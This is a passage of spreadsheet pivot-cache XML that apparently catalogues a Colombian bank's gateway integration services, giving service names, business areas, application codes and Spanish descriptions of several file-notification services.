    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionClienteDIAN"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionMinHacienda_AMH"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionOauth"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticarCompraVCAS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_CONSUINFOFISCYPARAFISCALCLI_CIFYPFDC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultaFuentesPrivadasExternas_CFPE"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultaProductosInvestBot_CPI"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultarToken_CTRA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ContribucionDocumental_CD"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DigitalizacionTarjetasMDES"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DigitalSignature_API"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DocumentDigitalization_API"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_EnvioCorreoElectronico_ECE"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ENVIOMENSAJERIAMOVIL"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_EnvioSMSRedeban_ESR"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionFraudeCrediticio_GFC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GESTIONLLAVECIFRADO_GLC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="APIC_x000a_CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionPuntosColombia_GPC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionRealceTarjetas_GRT"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionRecaudoDIAN"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="DIAN"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionSimCard"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionSolicitudPagos_GSP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionTransaccionesQRBilletera_GTQB"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Redeban"/>
    <s v="ISNBM001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_INALAMBRIA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_InformeMinHacienda_IMH"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_QFLOW_JSON_SERV"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_QFLOW_JSON_USER"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_RoboAdvisor_RA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_SendEmailWithAttach_API"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_SimpleCustomerAuthentication_SCA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_TRANSACCION_TOKEN_INVESTBOT_TTI"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_TRANSFERENCIAS_INVESTBOT_TI"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1208001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ValidacionPrimeraSegundaClave_VPSC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ValidarSesion_VS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_VerificacionCodigoAutorizacion_VCA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_LOGGING_ADAPTER_LA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_OAUTH_GPC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_PSE_VALORES"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_REALIZAR_OPERACION_FIDUCIARIA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SAP_ERP_TO_EC_COSTCENTER_REP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_AutenticacionCliente_AC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_AUTENTICAR_USUARIO_AU"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_CIPDC_V2"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConfirmarIdentidadPersonaEnDataCredito_CIPDC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultaMarcacionesPersonas"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultarFuentesPublicasExternas_CFPE"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_ConsultaTCRM_CTCRM"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_EnvioDataLiquidaPersona_EDLP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GESTION_SESION_GS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GESTIONAR_SESION_GS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Monitoreo y Transversales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GestionarPagareElectronico_GPE"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_GestionPrecalculadoCliente_GPC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_Notificacion_Nequi"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_NotificacionCreditoConsumo_NCC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_NotificacionNovedadTP_NNMA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_RecuperarCuentasDeposito_RCD"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SM_VinculacionCuentas_Nequi"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_SOMA_MANAGEMENT"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_WSCADP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_WSCADP_V1"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notifica Envio Archivo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_PAB _x000d__x000a_TVP _x000d__x000a_AW1065 _x000d__x000a_PSE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notifica Envio Archivo Iseries"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia, externos al iSeries, enviar un mensaje de notificación a aplicativos existentes en el iSeries Medellin de que se les ha dejado en una ruta IFS un archivo para que lo puedan procesar."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_TVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Archivo Pagos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio NotificacionArchivoPagos tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente pueda realizar la ejecución del archivo en lote."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Credito Consumo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite responder al canal Ventas Digitales las diferentes interacciones y pasos que tiene el flujo de solicitud de Credito de consumo."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
